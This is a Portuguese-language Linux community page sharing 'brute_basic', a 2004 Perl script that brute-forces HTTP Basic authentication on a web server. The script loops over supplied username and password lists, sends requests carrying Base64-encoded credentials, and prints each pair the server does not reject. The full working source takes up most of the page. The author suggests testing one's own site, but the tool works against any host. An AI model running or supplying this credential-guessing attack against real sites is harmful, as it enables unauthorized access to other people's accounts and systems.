brute_basic

Publicado por Marcelo 25/01/2004

[ Hits: 6.385 ]

Download brute_basic

0 0
Denuncie   Favoritos   Indicar  



Script que faz brute-force em autenticação via web do tipo Basic (digest ainda não foi incluído), o script precisa de duas listas de nomes, para usuários e senhas, você pode escolher entre método HEAD e GET (alguns sites bloqueiam HEAD), mas como o script ainda não trabalha com threads, ele é extremamente lento para grandes brute-forces, por isso é mais recomendado para testar o seu próprio website, o script utiliza HTTP 1.1, espero que em próximas versões eu inclua threads...

  



Esconder código-fonte

#!/usr/bin/perl
use Socket;
use IO::Socket;
use MIME::Base64;
if ($ARGV[3] =~ /g/) { $metodo='GET'; print "Utilizando método GET ao invés de H
EAD\n"; }
else { $metodo='HEAD'; }
open(logins,$ARGV[1]);
@url=split(/\//,$ARGV[0]);
$get='/';
$ip=gethostbyname($url[0]);
if ($ip) { $ip=inet_ntoa($ip); }
else {
 print "Erro no DNS ao tentar resolver $url[0]!\n";
 exit(1);
}
for ($i=1;$url[$i];$i++) {
 $get="$get/$url[$i]";
}
if (substr($ARGV[0],(length($ARGV[0])-1)) eq '/') { $get="$get/"; }
print "Iniciando tentativa de brute-force em $url[0]\n";
for ($nl=0;($user=<logins>);$nl++) {
 chop $user;
 close(senhas);
 open(senhas,$ARGV[2]);
 for ($np=0;($senha=<senhas>);$np++) {
  chop $senha;
  $final=encode_base64("$user:$senha");
  $sock=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>80,Timeout=>3);
  if ($sock) { print $sock "$metodo $get HTTP/1.1\nHost: $url[0]\nAuthorization:
 Basic $final\n\n"; }
  @div=split(/ /,<$sock>);
  if ($div[1] eq '403') {
   print "Forbidden retornado do servidor, pode ser um anti brute-force\n";
  }
  elsif ($div[1] eq '405') {
   print "O método $metodo não é permitido pelo servidor:\n";
   if ($metodo eq 'HEAD') {
    print "Tente usar a opção -g no final, que utiliza GET";
   }
   else {
    print "Alguma coisa muito estranha está acontecendo... o servidor não suporta o método GET, não é impossível, mas simplesmente inútil e impede a navegação normal. Verifique se está tudo certo e se o site é navegável!";
   }
   print "\nFechando o brute-force.\n";
   exit(1);
  }
  else {
   if ($div[1] ne '401') {
    print "$user:$senha -> OK! <-> Retorno: $div[1]\n";
    $a++;
   }
  }
#  print "$div[0] $div[1] $div[2]\n";
  close($sock);
 }
}
if (!$a) { $a=0; }
print "Programa terminado, combinações tentadas: ".($nl*$np).", senhas achadas: $a\n";

Scripts recomendados

Monitor de portas

Scanner TCP/ping

Gerador de Senhas Aleatórias VERSÃO 2.0

Multi Brute Force

Brutal Force Attack


  

Comentários

Nenhum coment�rio foi encontrado.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Servidor de Backup com Ubuntu Server 24.04 LTS, RAID e Duplicati (Dell PowerEdge T420)

Visualizar câmeras IP ONVIF no Linux sem necessidade de instalar aplicativos

Atualizar Debian Online de uma Versão para outra

Máquina perereca - até onde é possível o uso de Linux?

Mitigação - O que é e quando é "seguro" desabilitar

Dicas

Instalar driver Nvidia no Debian 13

Redimensionando, espelhando, convertendo e rotacionando imagens com script

Debian 13 Trixie para Iniciantes

Convertendo pacotes DEB que usam ZSTD (Padrão Novo) para XZ (Padrão Antigo)

Colocando skins no VLC Media Player

Tópicos

baschrc customizado pegeui vários. (3)

Chat GPT (7)

Rust é o "C da nossa geração"? (8)

Ubuntu com problemas no áudio (3)

Montagem em HD externo (1)

Top 10 do mês

Scripts

[Shell Script] Script ligar-scrolllock

[Shell Script] Como ver/ouvir vídeo/áudio via Terminal de modo prático

[Shell Script] Criar Script para apagar determinados arquivos

[Shell Script] inSANE - Script para usar Scanner

[Shell Script] Instalador do emulador de joystick Xbox para joystick generico para PC, PS2, PS3 (Debian e Derivados

A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.

Site hospedado por: